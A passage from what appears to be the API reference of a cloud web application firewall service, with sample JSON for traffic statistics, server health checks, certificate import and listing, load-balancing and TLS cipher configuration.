- "source": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/104.0.0.0 Safari/537.36",
- "value": {
- "count_sum": 5
}
}, - {
- "source": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0",
- "value": {
- "count_sum": 4
}
}, - {
- "source": "PostmanRuntime/7.29.0",
- "value": {
- "count_sum": 3
}
}, - {
- "source": "curl/7.68.0",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 127,
- "time": 1660329600000,
- "data": [ ]
}, - {
- "id": 128,
- "time": 1660330200000,
- "data": [
- {
- "source": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/104.0.0.0 Safari/537.36",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 129,
- "time": 1660330800000,
- "data": [
- {
- "source": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/104.0.0.0 Safari/537.36",
- "value": {
- "count_sum": 4
}
}, - {
- "source": "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5 skype-url-preview@microsoft.com",
- "value": {
- "count_sum": 3
}
}, - {
- "source": "curl/7.68.0",
- "value": {
- "count_sum": 4
}
}
]
}, - {
- "id": 130,
- "time": 1660331400000,
- "data": [ ]
}, - {
- "id": 131,
- "time": 1660332000000,
- "data": [
- {
- "source": "curl/7.68.0",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 132,
- "time": 1660332600000,
- "data": [ ]
}, - {
- "id": 133,
- "time": 1660333200000,
- "data": [ ]
}, - {
- "id": 134,
- "time": 1660333800000,
- "data": [ ]
}, - {
- "id": 135,
- "time": 1660334400000,
- "data": [ ]
}, - {
- "id": 136,
- "time": 1660335000000,
- "data": [ ]
}, - {
- "id": 137,
- "time": 1660335600000,
- "data": [ ]
}, - {
- "id": 138,
- "time": 1660336200000,
- "data": [ ]
}, - {
- "id": 139,
- "time": 1660336800000,
- "data": [ ]
}, - {
- "id": 140,
- "time": 1660337400000,
- "data": [ ]
}, - {
- "id": 141,
- "time": 1660338000000,
- "data": [ ]
}, - {
- "id": 142,
- "time": 1660338600000,
- "data": [ ]
}, - {
- "id": 143,
- "time": 1660339200000,
- "data": [ ]
}, - {
- "id": 144,
- "time": 1660339800000,
- "data": [ ]
}, - {
- "id": 145,
- "time": 1660340400000,
- "data": [ ]
}
]
}
}| ep_id required | string The application ID, it can be obtained from List Applications API. |
| type required | string Enum: "summary" "detail" Example: type=summary The type of query result |
| start_time required | string Example: start_time=1660326562527 The start time of timespan |
| end_time required | string Example: end_time=1660330162527 The end time of timespan |
| page | integer >= 1 Example: page=1 The page number of requested information |
| size | integer [ 1 .. 100 ] Default: 20 Example: size=10 The result table size (1-100) |
| sort_by | string Default: "count_sum" Enum: "count_sum" "average_http_request_bytes_sum" "average_http_response_bytes_sum" Example: sort_by=count_sum The field which will be sorted |
| dir required | string Enum: "req" "res" Example: dir=req The direction of the statistics |
| filter | string For example, for the IP details table, the filter is {"srccountry": "canada, united state", "src": "207.10.*.*"} |
{- "details": {
- "96.45.34.121": {
- "average_http_request_bytes": 9130,
- "count": 28,
- "country": "United States"
}, - "15.165.25.45": {
- "average_http_request_bytes": 166,
- "count": 1,
- "country": "Republic Of Korea"
}
}, - "summary": {
- "start": "1660326562527",
- "end": "1660330162527",
- "count": 13,
- "graph": [
- {
- "id": 1,
- "time": 1660326300000,
- "data": [ ]
}, - {
- "id": 2,
- "time": 1660326600000,
- "data": [ ]
}, - {
- "id": 3,
- "time": 1660326900000,
- "data": [ ]
}, - {
- "id": 4,
- "time": 1660327200000,
- "data": [ ]
}, - {
- "id": 5,
- "time": 1660327500000,
- "data": [ ]
}, - {
- "id": 6,
- "time": 1660327800000,
- "data": [ ]
}, - {
- "id": 7,
- "time": 1660328100000,
- "data": [
- {
- "source": "15.165.25.45",
- "value": {
- "average_http_request_bytes_sum": 166,
- "count_sum": 1
}
}, - {
- "source": "96.45.34.121",
- "value": {
- "average_http_request_bytes_sum": 399,
- "count_sum": 3
}
}
]
}, - {
- "id": 8,
- "time": 1660328400000,
- "data": [
- {
- "source": "96.45.34.121",
- "value": {
- "average_http_request_bytes_sum": 1099,
- "count_sum": 7
}
}
]
}, - {
- "id": 9,
- "time": 1660328700000,
- "data": [
- {
- "source": "96.45.34.121",
- "value": {
- "average_http_request_bytes_sum": 830,
- "count_sum": 5
}
}
]
}, - {
- "id": 10,
- "time": 1660329000000,
- "data": [
- {
- "source": "96.45.34.121",
- "value": {
- "average_http_request_bytes_sum": 5590,
- "count_sum": 10
}
}
]
}, - {
- "id": 11,
- "time": 1660329300000,
- "data": [
- {
- "source": "96.45.34.121",
- "value": {
- "average_http_request_bytes_sum": 1212,
- "count_sum": 3
}
}
]
}, - {
- "id": 12,
- "time": 1660329600000,
- "data": [ ]
}, - {
- "id": 13,
- "time": 1660329900000,
- "data": [ ]
}
]
}
}| ep_id required | string The application ID, it can be obtained from List Applications API. |
| type required | string Enum: "summary" "detail" Example: type=summary The type of query result |
| start_time required | string Example: start_time=1660326562527 The start time of timespan |
| end_time required | string Example: end_time=1660330162527 The end time of timespan |
| page | integer >= 1 Example: page=1 The page number of requested information |
| size | integer [ 1 .. 100 ] Default: 20 Example: size=10 The result table size (1-100) |
| filter | string For example, for the Agent details table, the filter is {"http_retcode":"200"} |
{- "details": {
- "get": {
- "count": 52
}
}, - "summary": {
- "start": "1660255034725",
- "end": "1660341434725",
- "count": 145,
- "graph": [
- {
- "id": 1,
- "time": 1660254600000,
- "data": [ ]
}, - {
- "id": 2,
- "time": 1660255200000,
- "data": [ ]
}, - {
- "id": 3,
- "time": 1660255800000,
- "data": [ ]
}, - {
- "id": 4,
- "time": 1660256400000,
- "data": [ ]
}, - {
- "id": 5,
- "time": 1660257000000,
- "data": [ ]
}, - {
- "id": 6,
- "time": 1660257600000,
- "data": [ ]
}, - {
- "id": 7,
- "time": 1660258200000,
- "data": [ ]
}, - {
- "id": 8,
- "time": 1660258800000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 2
}
}
]
}, - {
- "id": 9,
- "time": 1660259400000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 4
}
}
]
}, - {
- "id": 10,
- "time": 1660260000000,
- "data": [ ]
}, - {
- "id": 11,
- "time": 1660260600000,
- "data": [ ]
}, - {
- "id": 12,
- "time": 1660261200000,
- "data": [ ]
}, - {
- "id": 13,
- "time": 1660261800000,
- "data": [ ]
}, - {
- "id": 14,
- "time": 1660262400000,
- "data": [ ]
}, - {
- "id": 15,
- "time": 1660263000000,
- "data": [ ]
}, - {
- "id": 16,
- "time": 1660263600000,
- "data": [ ]
}, - {
- "id": 17,
- "time": 1660264200000,
- "data": [ ]
}, - {
- "id": 18,
- "time": 1660264800000,
- "data": [ ]
}, - {
- "id": 19,
- "time": 1660265400000,
- "data": [ ]
}, - {
- "id": 20,
- "time": 1660266000000,
- "data": [ ]
}, - {
- "id": 21,
- "time": 1660266600000,
- "data": [ ]
}, - {
- "id": 22,
- "time": 1660267200000,
- "data": [ ]
}, - {
- "id": 23,
- "time": 1660267800000,
- "data": [ ]
}, - {
- "id": 24,
- "time": 1660268400000,
- "data": [ ]
}, - {
- "id": 25,
- "time": 1660269000000,
- "data": [ ]
}, - {
- "id": 26,
- "time": 1660269600000,
- "data": [ ]
}, - {
- "id": 27,
- "time": 1660270200000,
- "data": [ ]
}, - {
- "id": 28,
- "time": 1660270800000,
- "data": [ ]
}, - {
- "id": 29,
- "time": 1660271400000,
- "data": [ ]
}, - {
- "id": 30,
- "time": 1660272000000,
- "data": [ ]
}, - {
- "id": 31,
- "time": 1660272600000,
- "data": [ ]
}, - {
- "id": 32,
- "time": 1660273200000,
- "data": [ ]
}, - {
- "id": 33,
- "time": 1660273800000,
- "data": [ ]
}, - {
- "id": 34,
- "time": 1660274400000,
- "data": [ ]
}, - {
- "id": 35,
- "time": 1660275000000,
- "data": [ ]
}, - {
- "id": 36,
- "time": 1660275600000,
- "data": [ ]
}, - {
- "id": 37,
- "time": 1660276200000,
- "data": [ ]
}, - {
- "id": 38,
- "time": 1660276800000,
- "data": [ ]
}, - {
- "id": 39,
- "time": 1660277400000,
- "data": [ ]
}, - {
- "id": 40,
- "time": 1660278000000,
- "data": [ ]
}, - {
- "id": 41,
- "time": 1660278600000,
- "data": [ ]
}, - {
- "id": 42,
- "time": 1660279200000,
- "data": [ ]
}, - {
- "id": 43,
- "time": 1660279800000,
- "data": [ ]
}, - {
- "id": 44,
- "time": 1660280400000,
- "data": [ ]
}, - {
- "id": 45,
- "time": 1660281000000,
- "data": [ ]
}, - {
- "id": 46,
- "time": 1660281600000,
- "data": [ ]
}, - {
- "id": 47,
- "time": 1660282200000,
- "data": [ ]
}, - {
- "id": 48,
- "time": 1660282800000,
- "data": [ ]
}, - {
- "id": 49,
- "time": 1660283400000,
- "data": [ ]
}, - {
- "id": 50,
- "time": 1660284000000,
- "data": [ ]
}, - {
- "id": 51,
- "time": 1660284600000,
- "data": [ ]
}, - {
- "id": 52,
- "time": 1660285200000,
- "data": [ ]
}, - {
- "id": 53,
- "time": 1660285800000,
- "data": [ ]
}, - {
- "id": 54,
- "time": 1660286400000,
- "data": [ ]
}, - {
- "id": 55,
- "time": 1660287000000,
- "data": [ ]
}, - {
- "id": 56,
- "time": 1660287600000,
- "data": [ ]
}, - {
- "id": 57,
- "time": 1660288200000,
- "data": [ ]
}, - {
- "id": 58,
- "time": 1660288800000,
- "data": [ ]
}, - {
- "id": 59,
- "time": 1660289400000,
- "data": [ ]
}, - {
- "id": 60,
- "time": 1660290000000,
- "data": [ ]
}, - {
- "id": 61,
- "time": 1660290600000,
- "data": [ ]
}, - {
- "id": 62,
- "time": 1660291200000,
- "data": [ ]
}, - {
- "id": 63,
- "time": 1660291800000,
- "data": [ ]
}, - {
- "id": 64,
- "time": 1660292400000,
- "data": [ ]
}, - {
- "id": 65,
- "time": 1660293000000,
- "data": [ ]
}, - {
- "id": 66,
- "time": 1660293600000,
- "data": [ ]
}, - {
- "id": 67,
- "time": 1660294200000,
- "data": [ ]
}, - {
- "id": 68,
- "time": 1660294800000,
- "data": [ ]
}, - {
- "id": 69,
- "time": 1660295400000,
- "data": [ ]
}, - {
- "id": 70,
- "time": 1660296000000,
- "data": [ ]
}, - {
- "id": 71,
- "time": 1660296600000,
- "data": [ ]
}, - {
- "id": 72,
- "time": 1660297200000,
- "data": [ ]
}, - {
- "id": 73,
- "time": 1660297800000,
- "data": [ ]
}, - {
- "id": 74,
- "time": 1660298400000,
- "data": [ ]
}, - {
- "id": 75,
- "time": 1660299000000,
- "data": [ ]
}, - {
- "id": 76,
- "time": 1660299600000,
- "data": [ ]
}, - {
- "id": 77,
- "time": 1660300200000,
- "data": [ ]
}, - {
- "id": 78,
- "time": 1660300800000,
- "data": [ ]
}, - {
- "id": 79,
- "time": 1660301400000,
- "data": [ ]
}, - {
- "id": 80,
- "time": 1660302000000,
- "data": [ ]
}, - {
- "id": 81,
- "time": 1660302600000,
- "data": [ ]
}, - {
- "id": 82,
- "time": 1660303200000,
- "data": [ ]
}, - {
- "id": 83,
- "time": 1660303800000,
- "data": [ ]
}, - {
- "id": 84,
- "time": 1660304400000,
- "data": [ ]
}, - {
- "id": 85,
- "time": 1660305000000,
- "data": [ ]
}, - {
- "id": 86,
- "time": 1660305600000,
- "data": [ ]
}, - {
- "id": 87,
- "time": 1660306200000,
- "data": [ ]
}, - {
- "id": 88,
- "time": 1660306800000,
- "data": [ ]
}, - {
- "id": 89,
- "time": 1660307400000,
- "data": [ ]
}, - {
- "id": 90,
- "time": 1660308000000,
- "data": [ ]
}, - {
- "id": 91,
- "time": 1660308600000,
- "data": [ ]
}, - {
- "id": 92,
- "time": 1660309200000,
- "data": [ ]
}, - {
- "id": 93,
- "time": 1660309800000,
- "data": [ ]
}, - {
- "id": 94,
- "time": 1660310400000,
- "data": [ ]
}, - {
- "id": 95,
- "time": 1660311000000,
- "data": [ ]
}, - {
- "id": 96,
- "time": 1660311600000,
- "data": [ ]
}, - {
- "id": 97,
- "time": 1660312200000,
- "data": [ ]
}, - {
- "id": 98,
- "time": 1660312800000,
- "data": [ ]
}, - {
- "id": 99,
- "time": 1660313400000,
- "data": [ ]
}, - {
- "id": 100,
- "time": 1660314000000,
- "data": [ ]
}, - {
- "id": 101,
- "time": 1660314600000,
- "data": [ ]
}, - {
- "id": 102,
- "time": 1660315200000,
- "data": [ ]
}, - {
- "id": 103,
- "time": 1660315800000,
- "data": [ ]
}, - {
- "id": 104,
- "time": 1660316400000,
- "data": [ ]
}, - {
- "id": 105,
- "time": 1660317000000,
- "data": [ ]
}, - {
- "id": 106,
- "time": 1660317600000,
- "data": [ ]
}, - {
- "id": 107,
- "time": 1660318200000,
- "data": [ ]
}, - {
- "id": 108,
- "time": 1660318800000,
- "data": [ ]
}, - {
- "id": 109,
- "time": 1660319400000,
- "data": [ ]
}, - {
- "id": 110,
- "time": 1660320000000,
- "data": [ ]
}, - {
- "id": 111,
- "time": 1660320600000,
- "data": [ ]
}, - {
- "id": 112,
- "time": 1660321200000,
- "data": [ ]
}, - {
- "id": 113,
- "time": 1660321800000,
- "data": [ ]
}, - {
- "id": 114,
- "time": 1660322400000,
- "data": [ ]
}, - {
- "id": 115,
- "time": 1660323000000,
- "data": [ ]
}, - {
- "id": 116,
- "time": 1660323600000,
- "data": [ ]
}, - {
- "id": 117,
- "time": 1660324200000,
- "data": [ ]
}, - {
- "id": 118,
- "time": 1660324800000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 119,
- "time": 1660325400000,
- "data": [ ]
}, - {
- "id": 120,
- "time": 1660326000000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 3
}
}
]
}, - {
- "id": 121,
- "time": 1660326600000,
- "data": [ ]
}, - {
- "id": 122,
- "time": 1660327200000,
- "data": [ ]
}, - {
- "id": 123,
- "time": 1660327800000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 4
}
}
]
}, - {
- "id": 124,
- "time": 1660328400000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 12
}
}
]
}, - {
- "id": 125,
- "time": 1660329000000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 13
}
}
]
}, - {
- "id": 126,
- "time": 1660329600000,
- "data": [ ]
}, - {
- "id": 127,
- "time": 1660330200000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 128,
- "time": 1660330800000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 11
}
}
]
}, - {
- "id": 129,
- "time": 1660331400000,
- "data": [ ]
}, - {
- "id": 130,
- "time": 1660332000000,
- "data": [
- {
- "source": "get",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 131,
- "time": 1660332600000,
- "data": [ ]
}, - {
- "id": 132,
- "time": 1660333200000,
- "data": [ ]
}, - {
- "id": 133,
- "time": 1660333800000,
- "data": [ ]
}, - {
- "id": 134,
- "time": 1660334400000,
- "data": [ ]
}, - {
- "id": 135,
- "time": 1660335000000,
- "data": [ ]
}, - {
- "id": 136,
- "time": 1660335600000,
- "data": [ ]
}, - {
- "id": 137,
- "time": 1660336200000,
- "data": [ ]
}, - {
- "id": 138,
- "time": 1660336800000,
- "data": [ ]
}, - {
- "id": 139,
- "time": 1660337400000,
- "data": [ ]
}, - {
- "id": 140,
- "time": 1660338000000,
- "data": [ ]
}, - {
- "id": 141,
- "time": 1660338600000,
- "data": [ ]
}, - {
- "id": 142,
- "time": 1660339200000,
- "data": [ ]
}, - {
- "id": 143,
- "time": 1660339800000,
- "data": [ ]
}, - {
- "id": 144,
- "time": 1660340400000,
- "data": [ ]
}, - {
- "id": 145,
- "time": 1660341000000,
- "data": [ ]
}
]
}
}Do health check on specific server, which helps client locate health check issues.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| server_index required | string The index of pserver, which starts from 0. |
| ep_id required | string The application ID, it can be obtained from List Applications API. |
[- "18.140.15.165"
]{- "summary": "Success",
- "value": {
- "18.140.15.165": {
- "status": "Succeeded",
- "detail": "",
- "elapsed": "61 ms",
- "http_req_header": [
- "HEAD / HTTP/1.1",
- "Host: z.clouddemo.com",
- "Accept: */*",
- "Accept-Language: en",
- "Content-Type: text/html",
- "User-Agent: HealthCheck",
- "Connection: close"
], - "http_resp_header": [
- "HTTP/1.1 302 Found",
- "Date: Tue, 23 Jun 2020 06:15:58 GMT",
- "Server: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.4.1",
- "Upgrade: h2",
- "Connection: Upgrade, close",
- "X-Powered-By: PHP/7.4.1",
- "Location: http://z.clouddemo.com/dashboard/",
- "Content-Type: text/html; charset=UTF-8"
]
}
}
}Get the information of CRL certificates configuration.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| forward | string True: the next page. False: the previous page. |
| cursor | string To list the items of the first page, leave the cursor value empty. To go forward to next page, get the value of the 'next_cursor' parameter in the result of the current page, then paste it here as the cursor value. To go to the previous page, get the 'prev_cursor' value, then paste it here as the cursor value. |
| size | integer An integer, the page size. The value shall be 10, 20, 30. |
{ }Modify CRL certificates configuration.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "detail": "Module updated"
}Get the information of intermediate certificates configuration.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| forward | string True: the next page. False: the previous page. |
| cursor | string To list the items of the first page, leave the cursor value empty. To go forward to next page, get the value of the 'next_cursor' parameter in the result of the current page, then paste it here as the cursor value. To go to the previous page, get the 'prev_cursor' value, then paste it here as the cursor value. |
| size | integer An integer, the page size. The value shall be 10, 20, 30. |
{- "total": 2,
- "prev_cursor": "eyJwb2xpY3lfbm...xIn19",
- "next_cursor": "",
- "hits": [
- {
- "id": 1,
- "issued_to": "MySSL.com",
- "issued_by": "MySSL.com",
- "expired": "2027-11-16 05:35:35 UTC"
}, - {
- "id": 2,
- "issued_to": "MySSL.com",
- "issued_by": "MySSL.com",
- "expired": "2027-11-16 05:35:35 UTC"
}
]
}Modify intermediate certificates configuration.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| action | string Enum: "import" "delete" The type of the update operation |
| certificate | string The intermediate certificate to be imported, required on action 'import' |
| id | integer The certificate id to be deleted, required on action 'delete' |
{- "action": "import",
- "certificate": "-----BEGIN CERTIFICATE-----\nMIIETDCCAzSgAw...eCsTo\n-----END CERTIFICATE-----"
}{- "detail": "Module updated"
}Get the detail information of CRL certificate.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| id | integer Example: id={{id}} The ID of the SNI certificate. |
{ }Get the information of CA certificates configuration.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| forward | string True: the next page. False: the previous page. |
| cursor | string To list the items of the first page, leave the cursor value empty. To go forward to next page, get the value of the 'next_cursor' parameter in the result of the current page, then paste it here as the cursor value. To go to the previous page, get the 'prev_cursor' value, then paste it here as the cursor value. |
| size | integer An integer, the page size. The value shall be 10, 20, 30. |
{ }Modify CA certificates configuration.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "detail": "Module updated"
}Get the detail information of CA certificate.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| id | integer Example: id={{id}} The ID of the SNI certificate. |
{ }Get the information of SNI certificates configuration.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| forward | string True: the next page. False: the previous page. |
| cursor | string To list the items of the first page, leave the cursor value empty. To go forward to next page, get the value of the 'next_cursor' parameter in the result of the current page, then paste it here as the cursor value. To go to the previous page, get the 'prev_cursor' value, then paste it here as the cursor value. |
| size | integer An integer, the page size. The value shall be 10, 20, 30. |
{- "total": 3,
- "prev_cursor": "eyJwb2xpY3lfbmFtZ....IxIn19",
- "next_cursor": "",
- "hits": [
- {
- "id": 1,
- "issued_to": "test.mytest.com",
- "issued_by": "MySSL.com",
- "san": [
- "home.mytest.com",
- "office.mytest.com",
- "test.mytest.com"
], - "expired": "2021-01-05 10:08:39 UTC",
- "status": "Invalid Chain"
}, - {
- "id": 2,
- "issued_to": "www",
- "issued_by": "subca1",
- "san": [ ],
- "expired": "2021-02-21 10:38:08 UTC",
- "status": "Invalid Chain"
}, - {
- "id": 3,
- "issued_to": "test.fortiweb-cloud-test.com",
- "issued_by": "MySSL.com",
- "san": [
- "test.fortiweb-cloud-test.com"
], - "expired": "2021-03-26 10:27:35 UTC",
- "status": "OK"
}
]
}Modify SNI certificates configuration.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| action | string Enum: "import" "delete" The type of the update operation |
| private_key | string The private key of the certificate, required on action 'import' |
| passwd | string The password of the encrypted private key, optional on action 'import' |
| certificate | string The certificate to be imported, required on action 'import' |
| id | integer The certificate id to be deleted, required on action 'delete' |
{- "action": "import",
- "private_key": "-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCA...6I6Bw\n-----END RSA PRIVATE KEY-----",
- "certificate": "-----BEGIN CERTIFICATE-----\nMIIETDCCAzSgAw...eCsTo\n-----END CERTIFICATE-----"
}{- "detail": "Module updated"
}Get the detail information of SNI certificate.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| id | integer Example: id={{id}} The ID of the SNI certificate. |
{- "result": {
- "extension": [
- {
- "Critical": "Yes",
- "Content": "Digital Signature, Key Encipherment",
- "Name": "keyUsage"
}, - {
- "Critical": "No",
- "Content": "TLS Web Server Authentication, TLS Web Client Authentication",
- "Name": "extendedKeyUsage"
}, - {
- "Critical": "No",
- "Content": "keyid:28:81:26:05:D1:34:1A:3F:C1:73:0F:BB:93:CF:15:1C:3F:03:BF:7F\n",
- "Name": "authorityKeyIdentifier"
}, - {
- "Critical": "No",
- "Content": "OCSP - URI:http://ocsp.myssl.com\nCA Issuers - URI:http://ca.myssl.com/myssltestrsa.crt\n",
- "Name": "authorityInfoAccess"
}, - {
- "Critical": "No",
- "Content": "DNS:home.mytest.com, DNS: office.mytest.com, DNS:test.mytest.com",
- "Name": "subjectAltName"
}
], - "subject": "C=CN, ST=Beijing, L=Beijing, O=FT, OU=DEV, CN=test.mytest.com",
- "valid_to": "2021-01-05 10:08:39 UTC",
- "valid_from": "2020-01-06 10:08:39 UTC",
- "serial_number": "69:5d:71:ce:d8:b9:4e:ac:a8:a8:5d:55:e0:60:61:fd",
- "version": 3,
- "issuer": "C=CN, O=MySSL, OU=MySSL Test RSA - For test use only, CN=MySSL.com"
}
}Get the configuration of servers.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "result": {
- "server_lb": {
- "server_balance": "enable",
- "lb_algorithm": "round-robin",
- "persistence_policy": {
- "persistence_type": "source-ip",
- "sourceip_timeout": 300
}, - "health": {
- "health_check": "enable",
- "url_path": "/",
- "interval": 10,
- "health_check_timeout": 3,
- "retry_times": 3,
- "method": "head",
- "response_code": 302
}
}, - "server_list": [
- {
- "idx": 1,
- "set_server_status": "enable",
- "server_type": "ip",
- "ssl": "enable",
- "server_port": 443,
- "weight": 1,
- "backup": "disable",
- "http2": "disable",
- "tls_1_1": "disable",
- "tls_1_2": "enable",
- "tls_1_3": "enable",
- "encryption_level": "high",
- "server_address": "1.1.1.1",
- "server_status": "disable",
- "locked": false
}, - {
- "idx": 2,
- "set_server_status": "enable",
- "server_type": "ip",
- "ssl": "enable",
- "server_port": 443,
- "weight": 1,
- "backup": "disable",
- "http2": "disable",
- "tls_1_1": "disable",
- "tls_1_2": "enable",
- "tls_1_3": "enable",
- "encryption_level": "high",
- "server_address": "2.2.2.2",
- "server_status": "disable",
- "locked": false
}
]
}
}Update the configuration of servers.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
required | object (ServerLoadBalance) |
required | Array of objects (ServerList) |
object (SslOptions) |
{- "server_lb": {
- "server_balance": "enable",
- "lb_algorithm": "round-robin",
- "persistence_policy": {
- "persistence_type": "source-ip",
- "sourceip_timeout": 300
}, - "health": {
- "health_check": "enable",
- "url_path": "/",
- "interval": 10,
- "health_check_timeout": 3,
- "retry_times": 3,
- "method": "head",
- "response_code": 302
}
}, - "server_list": [
- {
- "idx": 1,
- "set_server_status": "enable",
- "server_type": "ip",
- "ssl": "enable",
- "server_port": 443,
- "weight": 1,
- "backup": "disable",
- "http2": "disable",
- "tls_1_1": "disable",
- "tls_1_2": "enable",
- "tls_1_3": "enable",
- "encryption_level": "high",
- "server_address": "1.1.1.1",
- "server_status": "disable",
- "locked": false
}, - {
- "idx": 2,
- "set_server_status": "enable",
- "server_type": "ip",
- "ssl": "enable",
- "server_port": 443,
- "weight": 1,
- "backup": "disable",
- "http2": "disable",
- "tls_1_1": "disable",
- "tls_1_2": "enable",
- "tls_1_3": "enable",
- "encryption_level": "high",
- "server_address": "2.2.2.2",
- "server_status": "disable",
- "locked": false
}
]
}{- "detail": "Module updated"
}Get the detail information of intermediate certificate.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
| id | integer Example: id={{id}} The ID of the intermediate certificate. |
{- "result": {
- "extension": [
- {
- "Critical": "Yes",
- "Content": "Digital Signature, Certificate Sign, CRL Sign",
- "Name": "keyUsage"
}, - {
- "Critical": "No",
- "Content": "Any Extended Key Usage",
- "Name": "extendedKeyUsage"
}, - {
- "Critical": "Yes",
- "Content": "CA:TRUE",
- "Name": "basicConstraints"
}, - {
- "Critical": "No",
- "Content": "keyid:9A:F1:9F:B9:25:12:12:89:EC:73:18:B9:97:BC:C5:F8:A0:0A:7E:53",
- "Name": "authorityKeyIdentifier"
}, - {
- "Critical": "No",
- "Content": "28:81:26:05:D1:34:1A:3F:C1:73:0F:BB:93:CF:15:1C:3F:03:BF:7F",
- "Name": "subjectKeyIdentifier"
}
], - "subject": "C=CN, O=MySSL, OU=MySSL Test RSA - For test use only, CN=MySSL.com",
- "valid_to": "2027-11-16 05:35:35 UTC",
- "valid_from": "2017-11-16 05:35:35 UTC",
- "serial_number": "48:42:16:0c:f7:d6:4c:32:99:71:63:72:2f:63:be:7e",
- "version": 3,
- "issuer": "C=CN, O=MySSL, OU=MySSL Test Root - For test use only, CN=MySSL.com"
}
}Get the information of endpoints configuration.
Requires API key secret as Authorization request header. See Request format section for API key secret details.
| ep_id required | string Example: {{ep_id}} The application ID, it can be obtained from List Applications API. |
{- "app_name": "wl_us1",
- "ep_cname": "wl_us1.waasonline-test.54321.waasonline.net",
- "domain_name": "www.example.com",
- "extra_domains": [
- "a.example.com",
- "b.example.com"
], - "http_status": 0,
- "http2_status": 0,
- "https_status": 1,
- "ipv6_option": 0,
- "platform": "AWS",
- "cert_type": 0,
- "cert_auto_status": 0,
- "ssl_options": {
- "tls_1_0": 0,
- "tls_1_1": 0,
- "tls_1_2": 0,
- "tls_1_3": 1,
- "encryption_level": 2,
- "http_2_https": 1,
- "selected_ssl_custom_cipher": [
- "ECDHE-ECDSA-AES256-GCM-SHA384",
- "ECDHE-RSA-AES256-GCM-SHA384",
- "ECDHE-ECDSA-CHACHA20-POLY1305",
- "ECDHE-RSA-CHACHA20-POLY1305",
- "ECDHE-ECDSA-AES128-GCM-SHA256",
- "ECDHE-RSA-AES128-GCM-SHA256",
- "ECDHE-ECDSA-AES256-SHA384",
- "ECDHE-RSA-AES256-SHA384",
- "ECDHE-ECDSA-AES128-SHA256",
- "ECDHE-RSA-AES128-SHA256",
- "ECDHE-ECDSA-AES256-SHA",
- "ECDHE-RSA-AES256-SHA",
- "ECDHE-ECDSA-AES128-SHA",
- "ECDHE-RSA-AES128-SHA",
- "AES256-GCM-SHA384",
- "AES128-GCM-SHA256",
- "AES256-SHA256",
- "AES128-SHA256"
], - "available_ssl_custom_cipher": [
- "ECDHE-RSA-AES128-GCM-SHA256",
- "DHE-DSS-CAMELLIA128-SHA256",
- "AES256-SHA",
- "DHE-RSA-AES128-CCM",
- "AES256-GCM-SHA384",
- "DHE-RSA-AES256-CCM8",
- "AES128-CCM8",
- "ECDHE-ECDSA-AES256-SHA",
- "DHE-RSA-AES128-SHA256",
- "ECDHE-RSA-AES256-SHA384",
- "ECDHE-ECDSA-AES128-GCM-SHA256",
- "DHE-RSA-AES128-CCM8",
- "DHE-DSS-AES256-GCM-SHA384",
- "CAMELLIA256-SHA256",
- "DHE-DSS-AES256-SHA256",
- "CAMELLIA128-SHA256",
- "ECDHE-RSA-AES128-SHA",
- "ECDHE-ECDSA-CHACHA20-POLY1305",
- "ECDHE-RSA-DES-CBC3-SHA",
- "ECDHE-RSA-CAMELLIA128-SHA256",
